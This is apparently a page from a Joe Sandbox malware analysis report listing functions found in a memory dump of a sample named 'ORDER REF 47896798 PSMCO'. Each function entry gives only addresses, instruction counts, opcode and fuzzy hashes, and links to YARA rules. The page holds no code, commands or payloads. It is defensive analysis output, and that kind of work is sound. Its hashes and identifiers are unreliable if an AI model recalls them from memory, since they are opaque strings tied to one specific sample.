                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e8806dbdd8c5a78699dfa9b660c6bbfb75aaf109fb072c8819932e54b1ba68b9
                                                                                            • Instruction ID: 93c041fb1fb60dafbe473b27451f168c95fd7d2c9bd435965484ec73bfee6d82
                                                                                            • Opcode Fuzzy Hash: e8806dbdd8c5a78699dfa9b660c6bbfb75aaf109fb072c8819932e54b1ba68b9
                                                                                            • Instruction Fuzzy Hash: 80F0E271511E979FE722972CC548B15BBDC9BC07AAF089837D50ED7522C760F880DA50
                                                                                            Function 01942619 Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                            • Instruction ID: c33a08fe00d8699ddc101cf1f507ae373d54cd6be8e547985673e9f633fb5516
                                                                                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                            • Instruction Fuzzy Hash: 71E0D8323006016BE7119F599CC4F477B6EEFD6B10F05007AB5085F251C9E2DC0986A4
                                                                                            Function 01996030 Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                            • Instruction ID: 36ef949f9db254a3e9b57f5d69d8780499242e5482892fd0c2f747540386d906
                                                                                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                            • Instruction Fuzzy Hash: EEF01C72104204AFE7218F0AD984F52BBBCEB45365F46C426E6099B561D379EC40CBA4
                                                                                            Function 01900710 Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                            • Instruction ID: 829b6a9ca7fd10b0c3dfb5310e22b0f6cda01bcc6ef2989de18aea73be706e65
                                                                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                            • Instruction Fuzzy Hash: 54F0E5396047459FDB17CF1AC440A957BA8FB813A0F040454FC4A8B341D735EB81CB50
                                                                                            Function 019349D0 Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                            • Instruction ID: 0818adcc71d0bc90237f18bb7db71a9226e8aa1245a6fcfd69bb316e3ee44c8a
                                                                                            • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                            • Instruction Fuzzy Hash: 4FE0D832244145ABD3211A598800F667BA9EBD17A1F170429E20CCB150DB70DC42C7D8
                                                                                            Function 019D4164 Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d568dd0e8f4dfdae832b5e5e0ecac26a4fe0b5f3a37b7482483289705f8ea1d9
                                                                                            • Instruction ID: 45d16b4e2458ecc462d7816bbdcbd4173aa6b08725eddc4f36cdf5be8927bfc4
                                                                                            • Opcode Fuzzy Hash: d568dd0e8f4dfdae832b5e5e0ecac26a4fe0b5f3a37b7482483289705f8ea1d9
                                                                                            • Instruction Fuzzy Hash: D5F0E531A256914FEB72DB3CE144B5577E8BF60631F4E8564D41887D12C330EC80C650
                                                                                            Function 019A678E Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                            • Instruction ID: d3591179619df45d44600d8108edf9afd427c3aa3fffccb46630ffc87294c26a
                                                                                            • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                            • Instruction Fuzzy Hash: 6DE0DF32A00224BBEB2197998D05F9ABEBCDBD0EA0F0A0054B608E70E0E530EE04C6D0
                                                                                            Function 019D08C0 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                            • Instruction ID: 66743c3860c3535cee66218462732d1b0032c1c06c724e442a7adffdd56e9cdd
                                                                                            • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                            • Instruction Fuzzy Hash: FDE09B326403508BCB259A5DC141A53BFECDFD5661F19C07DE90D47612C232F842C6D1
                                                                                            Function 019025E0 Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 7cbc9aa0e00c770f455b415d534ac1b2ef0b41792869c9f164584aba06d4ce2b
                                                                                            • Instruction ID: fd487c6a542075587d709fae45e1fb8de52b4af6617bd946a0d885f7ab249817
                                                                                            • Opcode Fuzzy Hash: 7cbc9aa0e00c770f455b415d534ac1b2ef0b41792869c9f164584aba06d4ce2b
                                                                                            • Instruction Fuzzy Hash: 18E09232100A54ABC322BB29DD01F8A77AAEBA0760F114529B11957190CA30A950C784
                                                                                            Function 019BA456 Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                            • Instruction ID: 41e937e3777409452aef6baf0ead1e5ec75092136b3d276042c24c9be080191c
                                                                                            • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                            • Instruction Fuzzy Hash: E4E01231010A51DFE7366F2AD988B967AE6BF90B52F148C2DE19E124B0C7B998C1CA40
                                                                                            Function 01984000 Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                            • Instruction ID: 42e9f5c25018503ac2bfb03ee323344d29aedc29726f8324d25499500acf8407
                                                                                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                            • Instruction Fuzzy Hash: A7E0AE343003068BE715DF19C040B627BAABFD5A11F28C068A9488F205EB32A8438A40
                                                                                            Function 0193CA38 Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 75cb82086dc74fe259bbfe1268b7d38b94b5a3d9dc4c91ff3d581d2804d009c9
                                                                                            • Instruction ID: c15c7b36d83fed4b8ecc92f75f84327331626532ccc1639b45881be7d04aa442
                                                                                            • Opcode Fuzzy Hash: 75cb82086dc74fe259bbfe1268b7d38b94b5a3d9dc4c91ff3d581d2804d009c9
                                                                                            • Instruction Fuzzy Hash: 3CD02B324854317ACF36E1187C04FD33A9D9BC1320F064862F10CF2025D514DCC282C4
                                                                                            Function 018F823B Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                            • Instruction ID: 876e6f981fd2cf207d6af75473fbb298dc44b9d2b69e4cd7c2c3324c3980e41c
                                                                                            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                            • Instruction Fuzzy Hash: 93E0C236400A14EFDB322F15EC00F5177A5FF96B65F20482DF18A560A58770BDD2CB44
                                                                                            Function 01902050 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 89250bb5a881c50ada00aade59b6de8f93b1c8069178a02da897cb22b09d3908
                                                                                            • Instruction ID: c0415a904fe8a7ffa6fb451cbfbb070ff8f4701161708788d5fda009d7fc9fbd
                                                                                            • Opcode Fuzzy Hash: 89250bb5a881c50ada00aade59b6de8f93b1c8069178a02da897cb22b09d3908
                                                                                            • Instruction Fuzzy Hash: 1AE08C321009546BC212FB5DDD00E4A73AAEBE4660F100126B158872D4CA20AD40C794
                                                                                            Function 01938A90 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                            • Instruction ID: 825cf2ab43b35e703ab3dbd1cf0e42105a56418fa669406133456b39c5e404cb
                                                                                            • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                            • Instruction Fuzzy Hash: 53E08633111A1487C729DE18D515B7277E8EF85720F09473EA61787780C534E544C794
                                                                                            Function 01956AA4 Relevance: .0, Instructions: 17COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                            • Instruction ID: 37dd2cd4e46d2019373c16359a1f7591460c74fe27964c21d795cc5a794ecf4d
                                                                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                            • Instruction Fuzzy Hash: D4D05E36511A50AFD3329F1BEA00C13BBF9FBC4A21705062EA94983924C670A846CBA0
                                                                                            Function 0193E59C Relevance: .0, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                            • Instruction ID: b5aeeec03f19b3c83000d532740008babfaae929d54bf6f8e8c0b4269ec6eb6d
                                                                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                            • Instruction Fuzzy Hash: F7D0A932614620ABD732AA1CFC00FC333E8BB88731F060459B008C7064C360AC81CA84
                                                                                            Function 0197E908 Relevance: .0, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                            • Instruction ID: 5c2037b22780fc8aab0d4347a61c42e4e4a923f05ee07e074978c68bc95c16dd
                                                                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                            • Instruction Fuzzy Hash: F3E0EC36A506849FDF17DF59C640F5ABBB9BF94B40F150458A50C5B660C624A900CB40
                                                                                            Function 018FA0E3 Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                            • Instruction ID: 9c2ef51be42f0895c7c9a3d2f5d7077f8d1373bd47a35314a4ccb072c0fa815b
                                                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                            • Instruction Fuzzy Hash: 77D0223222203093DB2C56556800F637915EFC0BB4F0A002C3A0ED3800C0048D82C2E0
                                                                                            Function 0193A830 Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                            • Instruction ID: 5ff6e51fa41071429f8ea304c6a0b4ae06af26768e4e22c6d8462c5dd7072ad0
                                                                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                            • Instruction Fuzzy Hash: 58D012371E054DBBCB119F66DC01F957BA9E7A4BA0F444020B908875A0D63AE990D584
                                                                                            Function 0193CA24 Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f7e588daebca4c0a56d8927e0ca50c7e4aae273fa8ca7d7d5b4d22a2f9a24d5
                                                                                            • Instruction ID: a5cf0766a326d2b6d3675bc5a0cf28d0ca40bce768176d33591fc1403f22bbb3
                                                                                            • Opcode Fuzzy Hash: 3f7e588daebca4c0a56d8927e0ca50c7e4aae273fa8ca7d7d5b4d22a2f9a24d5
                                                                                            • Instruction Fuzzy Hash: 17D0A730919505DBDF17DF08C514D2E36B4FF50A41B40006CE708A1020E324DC02C700
                                                                                            Function 0193C700 Relevance: .0, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                            • Instruction ID: c37f48569bb05566f81a61d15264186d3abf9edbcbea3c086a4ef933a252064b
                                                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                            • Instruction Fuzzy Hash: 8BC012322A0648AFC712AA99CD01F027BA9EBA8B50F000021F6088B670D631E960EA84
                                                                                            Function 01920310 Relevance: .0, Instructions: 11COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                            • Instruction ID: dfe662dd081cec0cc163b5d39c257529b20ba5bba1e3091f2a0efd25343ec5f4
                                                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                            • Instruction Fuzzy Hash: 70D01236100249EFCB01DF41C890D9A772AFBD8710F148019FD19076108A31ED62DA90
                                                                                            Function 01900750 Relevance: .0, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                            • Instruction ID: 9fdf66d9bf204bbd5dd377fbe590b56ca76e5ce896e8e7eeaf2a8c3b4b8266ec
                                                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                            • Instruction Fuzzy Hash: 82C04879B01A468FCF16DB2AD294F59B7F8FB84751F150890E849DBB22E624EA41CA10
                                                                                            Function 01944340 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 58d04ade0c867ddf83f6ee69da7c8f24dfc4a2dfbce6f1555e066db3037efacf
                                                                                            • Instruction ID: 8ab759fe33d3ae23d9d5fb91a4fb977e0d85352ac0662877464426c5d2f923ed
                                                                                            • Opcode Fuzzy Hash: 58d04ade0c867ddf83f6ee69da7c8f24dfc4a2dfbce6f1555e066db3037efacf
                                                                                            • Instruction Fuzzy Hash: 6E900231605900129280B15948885468049A7E0301B55C011F4465554CCA148A565761
                                                                                            Function 01944650 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aad92f2dcec94e13f3bbaf763c27800d04e9c968d1f97c47c62d1cfb4c5a31af
                                                                                            • Instruction ID: 725f3b55a9daa460113e1d08bb14a0a6a77e9bd9d3945f5be27bd6e978fa7eb7
                                                                                            • Opcode Fuzzy Hash: aad92f2dcec94e13f3bbaf763c27800d04e9c968d1f97c47c62d1cfb4c5a31af
                                                                                            • Instruction Fuzzy Hash: 19900261601600424280B1594808406A049A7E1301395C115B4595560CC61889559769
                                                                                            Function 01942B80 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c24c05d91ad330e61a92cb3434593e9956b93d8eb55091e78f9a4e1bb1857264
                                                                                            • Instruction ID: e56422ffe0fdadaa06c4cc1b4dd062aa688fb3c9b8111018a5336aaaac644f81
                                                                                            • Opcode Fuzzy Hash: c24c05d91ad330e61a92cb3434593e9956b93d8eb55091e78f9a4e1bb1857264
                                                                                            • Instruction Fuzzy Hash: 3C90023120150802D244B1594808686404997D0301F55C011BA065655ED66589917731
                                                                                            Function 01942BA0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a892d2db8f062d6fe40097964cd1e64bd9f0959c5efbb3574362f6ae41c04e6b
                                                                                            • Instruction ID: 221cece1857253e74831153abc19a994b8dc3159cee643a558269ecf0c359b55
                                                                                            • Opcode Fuzzy Hash: a892d2db8f062d6fe40097964cd1e64bd9f0959c5efbb3574362f6ae41c04e6b
                                                                                            • Instruction Fuzzy Hash: 7B90023160550802D290B1594418746404997D0301F55C011B4065654DC7558B557BA1
                                                                                            Function 01942BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 716b56621917e6f88ad628b337ff762758973622f39244c2282c3ac13dd5c276
                                                                                            • Instruction ID: 619a6bf0cef02b2b806630b4fe09082ee8ef3baa74c6d69ba38257856d0143f3
                                                                                            • Opcode Fuzzy Hash: 716b56621917e6f88ad628b337ff762758973622f39244c2282c3ac13dd5c276
                                                                                            • Instruction Fuzzy Hash: 6390023120150802D2C0B159440864A404997D1301F95C015B4066654DCA158B597BA1
                                                                                            Function 01942BE0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9dc4e6cabcdd5f6603c0438b6f57b76527fbed633a26013fb64c4042e5a2a7ae
                                                                                            • Instruction ID: abbfad4ba4bd0a5926e8f25432b8c29a971c612e39e80d5cb5a37d603f040372
                                                                                            • Opcode Fuzzy Hash: 9dc4e6cabcdd5f6603c0438b6f57b76527fbed633a26013fb64c4042e5a2a7ae
                                                                                            • Instruction Fuzzy Hash: 5590023120554842D280B1594408A46405997D0305F55C011B40A5694DD6258E55BB61
                                                                                            Function 01942AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
